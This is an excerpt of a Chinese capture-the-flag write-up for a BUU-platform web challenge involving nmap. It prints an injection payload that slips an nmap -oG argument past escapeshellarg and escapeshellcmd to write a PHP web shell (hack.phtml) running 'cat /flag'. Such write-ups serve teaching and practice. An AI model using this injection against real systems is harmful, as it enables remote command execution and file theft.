Web 0x00 nmap Buu平台上一个题目， 原wp链接：https://blog.csdn.net/qq_26406447/article/details/100711933 使用使用nmap -oG参数写文件需要绕过 escapeshellarg和escapeshellcmd 写入payload： ' <? echo `cat /flag`;?> -oG hack.phtml ' 寻找文件位置，发现在根目录下，直接就能访问，获得flag 0x01 think_j...

阅读全文>>